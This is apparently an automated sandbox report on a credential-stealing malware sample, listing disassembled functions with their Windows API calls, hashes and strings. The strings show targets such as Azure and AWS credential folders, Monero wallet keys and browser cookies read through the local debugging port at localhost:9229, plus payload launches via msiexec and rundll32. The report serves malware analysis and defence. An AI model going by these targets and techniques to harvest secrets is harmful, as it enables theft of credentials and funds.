                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: a95705621287a17b2a34d9eab0369d059edc000126c8b9b8f769e5cad246e917
                                    • Instruction ID: b43d5dbe878ab14aa9abd2db9520c8220b948f748ff5e052e6f32ddf73f84a71
                                    • Opcode Fuzzy Hash: a95705621287a17b2a34d9eab0369d059edc000126c8b9b8f769e5cad246e917
                                    • Instruction Fuzzy Hash: 814194BAA50208A7DB10F770EC57FED736C9B65704F0049D4B289660D1EEB5A7CC8B92
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BE91FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 2aa79afa0057fd35a787eb0f6d6033e2e618d47be1f811379336823115093ee8
                                    • Instruction ID: c2855c7244ef5731ede92fe6facfa8ae24beaa16975298cdc7537d37701adbdf
                                    • Opcode Fuzzy Hash: 2aa79afa0057fd35a787eb0f6d6033e2e618d47be1f811379336823115093ee8
                                    • Instruction Fuzzy Hash: E371C9B1A14208AFDB14DFE5DC89FEEB7B8AF58700F108549F556A7290DB34E948CB60
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE3415
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE35AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: f0706d32cd2790ff732fcaebfc1fb0ff1832eb2b2179b1da962173e4e728c0ca
                                    • Instruction ID: cc6f165af55f7d33599f2ad9056ee18f6a748497c087a39961c2a754dffb12ec
                                    • Opcode Fuzzy Hash: f0706d32cd2790ff732fcaebfc1fb0ff1832eb2b2179b1da962173e4e728c0ca
                                    • Instruction Fuzzy Hash: 8B12FA71D101489ACB18FBA1DDA2FEEB7BDAF24300F1145E9E10666192EF347B49CB61
                                    APIs
                                      • Part of subcall function 00BD9A50: InternetOpenA.WININET(00BF0AF6,00000001,00000000,00000000,00000000), ref: 00BD9A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00BD9CAF
                                    • lstrcat.KERNEL32(?,00BF12C4), ref: 00BD9CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00BD9CD5
                                    • lstrcat.KERNEL32(?,00BF12C8), ref: 00BD9CE7
                                    • lstrcat.KERNEL32(?,?), ref: 00BD9CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00BD9D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00BD9D17
                                    • lstrlen.KERNEL32(00000000), ref: 00BD9D26
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: b4ab837c39e4682155e36e2e9cfb79d77461e399977e3472c02971ec3b2e1540
                                    • Instruction ID: 601d366e2cf475a7ceb5c75830fe8257469fa45e386f31bdd66783ce6c1ac2af
                                    • Opcode Fuzzy Hash: b4ab837c39e4682155e36e2e9cfb79d77461e399977e3472c02971ec3b2e1540
                                    • Instruction Fuzzy Hash: 7C5194B6910608ABCB14EBE4DC95FEEB7B8AF54301F404599F205A7190EF70AA4CCF61
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD62D0: InternetOpenA.WININET(00BF0DFF,00000001,00000000,00000000,00000000), ref: 00BD6331
                                      • Part of subcall function 00BD62D0: StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD6353
                                      • Part of subcall function 00BD62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6385
                                      • Part of subcall function 00BD62D0: HttpOpenRequestA.WININET(00000000,GET,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD63D5
                                      • Part of subcall function 00BD62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BD640F
                                      • Part of subcall function 00BD62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD6421
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE5568
                                    • lstrlen.KERNEL32(00000000), ref: 00BE557F
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00BE55B4
                                    • lstrlen.KERNEL32(00000000), ref: 00BE55D3
                                    • lstrlen.KERNEL32(00000000), ref: 00BE55FE
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 4863ecb69c261ca6955c044622300edaf79fcd004ed3b4b4db0ec2a342d65406
                                    • Instruction ID: b8c31674a70cec0ba20eb9591dae19cd93b5088e5652a7b83d125ad1fa21f8af
                                    • Opcode Fuzzy Hash: 4863ecb69c261ca6955c044622300edaf79fcd004ed3b4b4db0ec2a342d65406
                                    • Instruction Fuzzy Hash: AE51EB30910188AFCB14EF75CDA6BED77B9AF20344F5184A8E50A67591EF307B49CB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: db8354e5ef85b151620646ee59e75474020756419368cd1e22def5161c845a97
                                    • Instruction ID: 35ca7cc5406f10bb9d2fd913a29591a887e339733f33595e850be770fb059420
                                    • Opcode Fuzzy Hash: db8354e5ef85b151620646ee59e75474020756419368cd1e22def5161c845a97
                                    • Instruction Fuzzy Hash: 66C18FB69001199BCB14EF61DC99FDE77B9AF58304F0049D8E409A7242EB71FA89CF91
                                    APIs
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE453C
                                    • lstrcat.KERNEL32(?,018BE1A8), ref: 00BE455B
                                    • lstrcat.KERNEL32(?,?), ref: 00BE456F
                                    • lstrcat.KERNEL32(?,018BD330), ref: 00BE4583
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BE8F20: GetFileAttributesA.KERNEL32(00000000,?,00BD1B94,?,?,00BF577C,?,?,00BF0E22), ref: 00BE8F2F
                                      • Part of subcall function 00BDA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BDA489
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                      • Part of subcall function 00BE9550: GlobalAlloc.KERNEL32(00000000,00BE462D,00BE462D), ref: 00BE9563
                                    • StrStrA.SHLWAPI(?,018BDFE0), ref: 00BE4643
                                    • GlobalFree.KERNEL32(?), ref: 00BE4762
                                      • Part of subcall function 00BDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA23F
                                      • Part of subcall function 00BDA210: LocalAlloc.KERNEL32(00000040,?,?,?,00BD4F3E,00000000,?), ref: 00BDA251
                                      • Part of subcall function 00BDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA27A
                                      • Part of subcall function 00BDA210: LocalFree.KERNEL32(?,?,?,?,00BD4F3E,00000000,?), ref: 00BDA28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE46F3
                                    • StrCmpCA.SHLWAPI(?,00BF08D2), ref: 00BE4710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BE4722
                                    • lstrcat.KERNEL32(00000000,?), ref: 00BE4735
                                    • lstrcat.KERNEL32(00000000,00BF0FA0), ref: 00BE4744
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: a37db713678f3c1c107f4c30992816d9bedcff1659c405ceb4327c9c8d9eb5a5
                                    • Instruction ID: be4366a28d622ea935428560317f5e0e9d97fc107a1a00b39e5c5600777dd217
                                    • Opcode Fuzzy Hash: a37db713678f3c1c107f4c30992816d9bedcff1659c405ceb4327c9c8d9eb5a5
                                    • Instruction Fuzzy Hash: 327155B6910208ABDB14EBB1DD45FEE77BDAB89300F0045D8B605A7151EB35EB48CFA1
                                    APIs
                                      • Part of subcall function 00BD12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD12B4
                                      • Part of subcall function 00BD12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BD12BB
                                      • Part of subcall function 00BD12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BD12D7
                                      • Part of subcall function 00BD12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BD12F5
                                      • Part of subcall function 00BD12A0: RegCloseKey.ADVAPI32(?), ref: 00BD12FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BD134F
                                    • lstrlen.KERNEL32(?), ref: 00BD135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00BD1377
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BD1465
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BD14EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 83c90af36ec998775598b57e4d7a396184418cfeef64832f8938b465be0526fb
                                    • Instruction ID: 8ff66860b3cf60ba50207702ab92f596ca91161015101d985319be239257cff0
                                    • Opcode Fuzzy Hash: 83c90af36ec998775598b57e4d7a396184418cfeef64832f8938b465be0526fb
                                    • Instruction Fuzzy Hash: E35130B1D501589BCB15FB61DDA2FED73BC9F54300F4045E8B60A62192EF307B89CAA6
                                    APIs
                                    • InternetOpenA.WININET(00BF0AF6,00000001,00000000,00000000,00000000), ref: 00BD9A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00BD9AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD9AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: 394dfed9440d265cd28867b9dee709673559f1db13a9843842b1ae40222b2526
